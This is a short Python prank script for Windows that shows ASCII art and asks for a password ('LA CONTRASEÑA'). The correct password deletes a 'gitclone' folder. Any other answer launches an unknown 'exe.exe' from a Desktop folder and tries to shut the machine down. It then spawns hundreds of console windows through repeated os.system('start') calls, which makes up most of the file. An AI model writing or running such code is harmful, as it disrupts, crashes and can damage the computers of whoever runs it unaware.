import os
import time
def print2(color):
    os.system(color)
    print('.................................................')
    print('.................................................')
    print('..................:::-.-..-:+::..................')
    print('...............:+--.--.....-:...:-...............')
    print('..............++*+==-...-...-=#**-+..............')
    print('.............:+@**@+....+:...+@#*@*:.............')
    print('.............+@@*=@-....=-....##=@@+.............')
    print('.............:=@#:@:...---.--+@=#@#+.............')
    print('.............-=@*++--:#==*#*++*==@=:.............')
    print('.............*#*@@@@#+-**=+*=@@@@*#=.............')
    print('.............+@#@@@@@@#*+=#@@@@@@#@*.............')
    print('.............++++#@@**=+@****#@#+*+*.............')
    print('.............+=+*::..:*@=@=+.-++=***.............')
    print('..............+=###=+:::*:++:*###=+..............')
    print('...............-=##=**--.:::+=##=:...............')
    print('...............:+*=+***==*+**===+:...............')
    print('................*:=#@@#*=*@@@##+=................')
    print('.........-++:+-.-#++*+:+*+:***:#:..-+*:..........')
    print('.........*:..@*+:.***-.-=+.:**=..++#:-:::........')
    print('.........+-::::*:=:-+##=*=#@*-.=:+*-...:-........')
    print('.............-++:-:#+.......:==-::++:::-.........')
    print('.................::-+-::.::-+-:+-................')
    print('....................+-:*---.+-...................')
    print('...................:*-...+-:+....................')
    print('...............-++::-.:-.:-.--++.................')
    print('..........-@#+++:--::......-+--::+*#@+...........')
    print('..........-=-.-+*:............:*+-.-*@...........')
    print('............-*+..................+**:............')
    print('.................................................')
    print('.................................................')
    print('                   LA CONTRASEÑA:                      ')

def bn():
    print('++++++++++++++++++++++++++++++++++++++++')
    print('++++++++++++++++=@@@=*++++++++++++++++++')
    print('+++++++++++++*@W#++++=WW=+++++++++++++++')
    print('+++++++++++*W#++++++++++#W#+++++++++++++')
    print('++++++++++=W=+++++++++++++@W*+++++++++++')
    print('+++++++++#W*++*0+++++0+++++#W*++++++++++')
    print('++++++++*W=+++++++++++++++++W#++++++++++')
    print('++++++++=W*++*W#**=#++++++++W#++++++++++')
    print('+++++++++W#++++*==*+++++++*W#+++++++++++')
    print('+++++++++*W@*++++++++*=#WW#+++++++++++++')
    print('++++++++++++=@WWWWW@#=*+++++++++++++++++')
    print('++++++++++*++++++*W*++++++++++++++++++++')
    print('++++++++=@W+++++++@@++++++++++++++++++++')
    print('++++++++WWW=++++++#W++++++++++++++++++++')
    print('++++++++++*@W=++++=W++++++++++++++++++++')
    print('+++++++++++++=####@W@WW*++++++++++++++++')
    print('++++++++++++++++++=W+=W*++++++++++++++++')
    print('++++++++++++++++++=W*+W@++++++++++++++++')
    print('++++++++++++++++++*W*+##++++++++++++++++')
    print('++++++++++++++++++*W=+++++++++++++++++++')
    print('+++++++++++++++++*W#@#++++++++++++++++++')
    print('++++++++++++++++#W*+*W#+++++++++++++++++')
    print('+++++++++++++++=W*++++@@++++++++++++++++')
    print('++++++++++++++++++++++++++++++++++++++++')


def comand():
    res = input('=>')
    if res == 'python12':
        os.system('cd.. && del gitclone && cd .. && del gitclone')
        bn()
    else:                                                                                             ##
        os.system('cd .. && cd .. && cd.. && cd .. && cd .. && cd.. && cd.. && cd.. && cd Desktop && cd aaaaaaaaaaaaaa && start exe.exe && shutdowm /s')
        os.system('start')
        os.system('start')
        os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start')
        os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') 
        os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start') ; os.system('start')
def setup():
    print2('color a')
    comand()


setup()
